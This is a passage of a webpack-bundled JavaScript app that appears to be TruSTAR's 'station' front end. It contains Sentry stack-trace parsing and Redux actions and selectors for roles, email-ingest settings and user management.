/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["c"] = exceptionFromStacktrace;
/* harmony export (immutable) */ __webpack_exports__["a"] = eventFromPlainObject;
/* harmony export (immutable) */ __webpack_exports__["b"] = eventFromStacktrace;
/* harmony export (immutable) */ __webpack_exports__["d"] = prepareFramesForEvent;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__tracekit__ = __webpack_require__(515);


var STACKTRACE_LIMIT = 50;
/**
 * This function creates an exception from an TraceKitStackTrace
 * @param stacktrace TraceKitStackTrace that will be converted to an exception
 * @hidden
 */
function exceptionFromStacktrace(stacktrace) {
    var frames = prepareFramesForEvent(stacktrace.stack);
    var exception = {
        type: stacktrace.name,
        value: stacktrace.message,
    };
    if (frames && frames.length) {
        exception.stacktrace = { frames: frames };
    }
    // tslint:disable-next-line:strict-type-predicates
    if (exception.type === undefined && exception.value === '') {
        exception.value = 'Unrecoverable error caught';
    }
    return exception;
}
/**
 * @hidden
 */
function eventFromPlainObject(exception, syntheticException) {
    var exceptionKeys = Object.keys(exception).sort();
    var event = {
        extra: {
            __serialized__: Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["v" /* normalizeToSize */])(exception),
        },
        message: "Non-Error exception captured with keys: " + Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["s" /* keysToEventMessage */])(exceptionKeys),
    };
    if (syntheticException) {
        var stacktrace = Object(__WEBPACK_IMPORTED_MODULE_1__tracekit__["a" /* _computeStackTrace */])(syntheticException);
        var frames_1 = prepareFramesForEvent(stacktrace.stack);
        event.stacktrace = {
            frames: frames_1,
        };
    }
    return event;
}
/**
 * @hidden
 */
function eventFromStacktrace(stacktrace) {
    var exception = exceptionFromStacktrace(stacktrace);
    return {
        exception: {
            values: [exception],
        },
    };
}
/**
 * @hidden
 */
function prepareFramesForEvent(stack) {
    if (!stack || !stack.length) {
        return [];
    }
    var localStack = stack;
    var firstFrameFunction = localStack[0].func || '';
    var lastFrameFunction = localStack[localStack.length - 1].func || '';
    // If stack starts with one of our API calls, remove it (starts, meaning it's the top of the stack - aka last call)
    if (firstFrameFunction.includes('captureMessage') || firstFrameFunction.includes('captureException')) {
        localStack = localStack.slice(1);
    }
    // If stack ends with one of our internal API calls, remove it (ends, meaning it's the bottom of the stack - aka top-most call)
    if (lastFrameFunction.includes('sentryWrapped')) {
        localStack = localStack.slice(0, -1);
    }
    // The frame where the crash happened, should be the last entry in the array
    return localStack
        .map(function (frame) { return ({
        colno: frame.column,
        filename: frame.url || localStack[0].url,
        function: frame.func || '?',
        in_app: true,
        lineno: frame.line,
    }); })
        .slice(0, STACKTRACE_LIMIT)
        .reverse();
}
//# sourceMappingURL=parsers.js.map

/***/ }),
/* 772 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BaseTransport; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);


/** Base Transport class implementation */
var BaseTransport = /** @class */ (function () {
    function BaseTransport(options) {
        this.options = options;
        /** A simple buffer holding all requests. */
        this._buffer = new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["a" /* PromiseBuffer */](30);
        this.url = new __WEBPACK_IMPORTED_MODULE_0__sentry_core__["a" /* API */](this.options.dsn).getStoreEndpointWithUrlEncodedAuth();
    }
    /**
     * @inheritDoc
     */
    BaseTransport.prototype.sendEvent = function (_) {
        throw new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["b" /* SentryError */]('Transport Class has to implement `sendEvent` method');
    };
    /**
     * @inheritDoc
     */
    BaseTransport.prototype.close = function (timeout) {
        return this._buffer.drain(timeout);
    };
    return BaseTransport;
}());

//# sourceMappingURL=base.js.map

/***/ }),
/* 773 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Role; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Role = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  internal: null,
  name: '',
  displayName: '',
  permissions: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()
});

/***/ }),
/* 774 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_FAILURE; });
var prefix = function prefix(str) {
  return 'station/roles/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

/***/ }),
/* 775 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_FAILURE; });
var prefix = function prefix(str) {
  return 'station/sectors/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

/***/ }),
/* 776 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return SET_ENCLAVE_MENU; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return SELECT_DEFAULT_ENCLAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return TIMEZONE_CHANGED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return SAVE_EMAIL_SETTINGS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return SAVE_EMAIL_SETTINGS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return SAVE_EMAIL_SETTINGS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_INGEST_EMAILS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_INGEST_EMAILS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_INGEST_EMAILS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CANCEL_CONFIRM_DELETE_INGEST_EMAIL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return CONFIRM_DELETE_INGEST_EMAIL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return DELETE_INGEST_EMAIL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return DELETE_INGEST_EMAIL_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return DELETE_INGEST_EMAIL_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return EDIT_EMAIL_INGEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return CLEAR_EMAIL_INGEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return TOGGLE_SELECT_EMAIL_INGEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return CLEAR_SELECTED_EMAIL_INGEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return CREATE_NEW_EMAIL_INGEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return CLOSE_NEW_EMAIL_FORM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return CONFIRM_REQUEST_NEW_INGEST_EMAIL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CANCEL_CONFIRM_REQUEST_NEW_INGEST_EMAIL; });
var prefix = function prefix(str) {
  return 'station/settings/' + str;
};

var SET_ENCLAVE_MENU = prefix('SET_ENCLAVE_MENU');

var SELECT_DEFAULT_ENCLAVE = prefix('SELECT_DEFAULT_ENCLAVE');

var TIMEZONE_CHANGED = prefix('TIMEZONE_CHANGED');

var SAVE_EMAIL_SETTINGS = prefix('SAVE_EMAIL_SETTINGS');
var SAVE_EMAIL_SETTINGS_SUCCESS = prefix('SAVE_EMAIL_SETTINGS_SUCCESS');
var SAVE_EMAIL_SETTINGS_FAILURE = prefix('SAVE_EMAIL_SETTINGS_FAILURE');

var FETCH_INGEST_EMAILS = prefix('FETCH_INGEST_EMAILS');
var FETCH_INGEST_EMAILS_SUCCESS = prefix('FETCH_INGEST_EMAILS_SUCCESS');
var FETCH_INGEST_EMAILS_FAILURE = prefix('FETCH_INGEST_EMAILS_FAILURE');

var CANCEL_CONFIRM_DELETE_INGEST_EMAIL = prefix('CANCEL_CONFIRM_DELETE_INGEST_EMAIL');
var CONFIRM_DELETE_INGEST_EMAIL = prefix('CONFIRM_DELETE_INGEST_EMAIL');
var DELETE_INGEST_EMAIL = prefix('DELETE_INGEST_EMAIL');
var DELETE_INGEST_EMAIL_SUCCESS = prefix('DELETE_INGEST_EMAIL_SUCCESS');
var DELETE_INGEST_EMAIL_FAILURE = prefix('DELETE_INGEST_EMAIL_FAILURE');

var EDIT_EMAIL_INGEST = prefix('EDIT_EMAIL_INGEST');
var CLEAR_EMAIL_INGEST = prefix('CLEAR_EMAIL_INGEST');

var TOGGLE_SELECT_EMAIL_INGEST = prefix('TOGGLE_SELECT_EMAIL_INGEST');
var CLEAR_SELECTED_EMAIL_INGEST = prefix('CLEAR_SELECTED_EMAIL_INGEST');

var CREATE_NEW_EMAIL_INGEST = prefix('CREATE_NEW_EMAIL_INGEST');
var CLOSE_NEW_EMAIL_FORM = prefix('CLOSE_NEW_EMAIL_FORM');

var CONFIRM_REQUEST_NEW_INGEST_EMAIL = prefix('CONFIRM_REQUEST_NEW_INGEST_EMAIL');
var CANCEL_CONFIRM_REQUEST_NEW_INGEST_EMAIL = prefix('CANCEL_CONFIRM_REQUEST_NEW_INGEST_EMAIL');

/***/ }),
/* 777 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveMenuOpen", function() { return enclaveMenuOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "timezone", function() { return timezone; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ingestEmails", function() { return ingestEmails; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "emailOptions", function() { return emailOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "emailLoading", function() { return emailLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentIngestEmailId", function() { return currentIngestEmailId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "totalEmailCount", function() { return totalEmailCount; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSelectedIngestEmails", function() { return getSelectedIngestEmails; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "creatingAdditionalInbox", function() { return creatingAdditionalInbox; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "showDeleteIngestModal", function() { return showDeleteIngestModal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "showRequestNewInboxModal", function() { return showRequestNewInboxModal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isCurrentlyEditing", function() { return isCurrentlyEditing; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "maxEmailCount", function() { return maxEmailCount; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentIngestEmail", function() { return currentIngestEmail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ingestEmailsWithEnclaves", function() { return ingestEmailsWithEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "emailIngestSelectEnclaves", function() { return emailIngestSelectEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentIngestEmailFormValues", function() { return currentIngestEmailFormValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialValues", function() { return getInitialValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters_js__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_profile_getters_js__ = __webpack_require__(142);








var enclaveMenuOpen = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'enclaveMenuOpen']);
var timezone = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'timezone']);
var ingestEmails = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'ingestEmails']);
var emailOptions = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'emailOptions']);
var emailLoading = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'emailLoading']);
var currentIngestEmailId = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'currentIngestEmailId']);
var totalEmailCount = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'totalEmailCount']);
var getSelectedIngestEmails = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'selectedIngestEmails']);
var creatingAdditionalInbox = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'creatingAdditionalInbox']);
var showDeleteIngestModal = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'showDeleteIngestModal']);
var showRequestNewInboxModal = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['settings', 'showRequestNewIngestModal']);

var isCurrentlyEditing = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentIngestEmailId], function (currentlyEditedEmail) {
  return !!currentlyEditedEmail;
});

var maxEmailCount = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_5_modules_profile_getters_js__["company"]], function (company) {
  return company.get('maxIngestEmailsCount');
});

var currentIngestEmail = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([ingestEmails, currentIngestEmailId], function (emails, id) {
  return emails.get(id);
});

var ingestEmailsWithEnclaves = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([ingestEmails, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters_js__["enclavesMap"]], function (emails, enclaves) {
  return emails.map(function (x) {
    return x.set('enclave', enclaves.get(x.get('enclaveGuid')));
  }).valueSeq();
});

/* Map user enclaves to array of enclave names for select menu */
var emailIngestSelectEnclaves = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_5_modules_profile_getters_js__["submissionEnclaves"]], function (enclaves) {
  return enclaves.sort(Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetizeByKey"])('name')).map(function (e) {
    return {
      label: e.get('name'),
      value: e.get('id')
    };
  }).toIndexedSeq().toArray();
});

var currentIngestEmailFormValues = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentIngestEmail], Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["tryCatch"])(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(function (x) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(x.toObject());
}, function (x) {
  return x.update('ingestEmail', function (x) {
    return x.replace(/@.+$/g, '');
  });
}, // Strip out @ingest.trustar.co
function (x) {
  return x.update('fromEmails', function (xs) {
    return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(xs).map(function (from) {
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({ from: from });
    });
  });
}, function (x) {
  return x.update('subjectPrefixes', function (xs) {
    return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(xs).map(function (subjectPrefix) {
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({ subjectPrefix: subjectPrefix });
    });
  });
}), function () {
  return null;
}));

// Initial form value for both updating and creating new email ingests
var getInitialValues = function getInitialValues() {
  var defaults = {
    ingestEmail: '',
    fromEmails: [], // Create a single empty field to initialize the FieldArrays
    subjectPrefixes: [], // See NOTE
    enableRedaction: false
  };

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(defaults);
};

/***/ }),
/* 778 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchUser", function() { return fetchUser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "search", function() { return search; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveUser", function() { return saveUser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteUser", function() { return deleteUser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deactivateUser", function() { return deactivateUser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetPassword", function() { return resetPassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportAll", function() { return exportAll; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "autosuggest", function() { return autosuggest; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(413);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(517);






// Fetch all users
var fetch = function fetch() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH */],
    payload: payload
  };
};

// Fetch a specific user
var fetchUser = function fetchUser(userId) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* FETCH_USER */],
    userId: userId
  };
};

// Set display options; sorts and filters users for Admins
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["v" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

var search = function search(query) {
  return setDisplayOptions({ query: query });
};

// Either create or update a user, depending on whether or not they have a guid.
var saveUser = function saveUser(user) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["s" /* SAVE */],
    payload: user
  };
};

var deleteUser = function deleteUser(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* DELETE */],
    payload: id
  };
};

var deactivateUser = function deactivateUser(email, deactivated) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* DEACTIVATE */],
    payload: { email: email, deactivated: deactivated }
  };
};

// Send an email to user to reset their password or setup their account.
var resetPassword = function resetPassword(user) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* RESET_PASSWORD */],
    payload: user
  };
};

/**
 * Export all users by downloading a csv file.
 * We use an iframe to avoid possibly redirecting the main browser to a faulty
 * endpoint that would case the user to lose anything they were in the middle
 * of.
 */
var exportAll = function exportAll() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* EXPORT_ALL */]
  };
};

/**
 * Autosuggest users to mention based on the val string
 */
var autosuggest = function autosuggest(val) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* AUTOSUGGEST */],
    payload: val
  };
};

/***/ }),
/* 779 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "usersMap", function() { return usersMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "autosuggestText", function() { return autosuggestText; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "userListPopulated", function() { return userListPopulated; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "user", function() { return user; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyAdmins", function() { return companyAdmins; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "suggestedUsers", function() { return suggestedUsers; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "users", function() { return users; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "roleOptions", function() { return roleOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyOptions", function() { return companyOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setAccessType", function() { return setAccessType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types_js__ = __webpack_require__(413);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_companies_getters__ = __webpack_require__(708);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_enclave_utils__ = __webpack_require__(297);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_roles_types_js__ = __webpack_require__(773);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_roles_getters__ = __webpack_require__(1431);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();











var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('app:modules:users:getters'); // eslint-disable-line no-unused-vars









var usersMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['users', 'users']);

var autosuggestText = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['users', 'autosuggestText']);

var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['users', 'loading']);

var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['users', 'options']);

var userListPopulated = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(usersMap, function (users) {
  return users && users.size > 0;
});

var user = function user(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(usersMap, function (users) {
    return users.get(guid);
  });
};

var companyAdmins = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(usersMap, Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["filter"])(function (x) {
  return x.get('isCompanyAdmin', false);
}), function (x) {
  return x.toList();
}));

/**
 * Format users into plain objects for use with the draft-js mentions plugin
 */
var formatMentionSuggestions = function formatMentionSuggestions(x) {
  return {
    guid: x.get('guid'),
    name: x.get('firstName') + ' ' + x.get('lastName'), // Need this to be `name` for suggestions to work
    email: x.get('email')
  };
};

var filterByQuery = function filterByQuery(_str) {
  return function (user) {
    if (!_str) return true;
    var str = _str.toLowerCase();
    var name = user.name.toLowerCase();
    var email = user.email.toLowerCase();
    return name.includes(str) || email.includes(str);
  };
};

/**
 * Get a an Array<Object> of user suggestions to be used when autocompleting the
 * users typing as they tag other users in their company
 */
var suggestedUsers = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([usersMap, __WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["company"], __WEBPACK_IMPORTED_MODULE_10_modules_profile_getters__["profile"], autosuggestText], function () {
  for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
    args[_key] = arguments[_key];
  }

  return __WEBPACK_IMPORTED_MODULE_6_trustar_fp__["IO"].of(args) // Wrap for error handling
  .map(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 4),
        users = _ref2[0],
        company = _ref2[1],
        profile = _ref2[2],
        query = _ref2[3];

    return users.toSeq().valueSeq().filter(function (x) {
      return x.getIn(['company', 'guid']) === profile.getIn(['company', 'guid']);
    }) // In my company...
    .filter(function (x) {
      return x.get('guid') !== profile.get('guid');
    }) // ...but not me
    .map(formatMentionSuggestions).filter(filterByQuery(query)).sort(Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__["sortBy"])('name', 'ASC')).take(5) // Limit to 5
    .toJS();
  }).foldOr(function (err) {
    debug('Could not create company users list:', err);
    return []; // Always return array
  });
});

// TODO
// Work in progress. Does not yet filter companies b/c the user object does not
// have a company ID on it
var users = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([usersMap, displayOptions, __WEBPACK_IMPORTED_MODULE_13_modules_roles_getters__["roles"]], function (users, options, roles) {
  var companyGuid = options.get('companyGuid');
  var enclaveId = options.get('enclaveId');
  var roleId = options.get('roleId');
  return users.filter(function (user) {
    if (!companyGuid && !enclaveId && !roleId) return true;

    if (companyGuid && user.getIn(['company', 'guid']) !== companyGuid) {
      return false;
    }

    if (enclaveId && !user.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()).keySeq().contains(enclaveId)) {
      return false;
    }

    // Test all top-level string values
    return user.toSeq().valueSeq().filter(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default.a);
  }).toList();
});

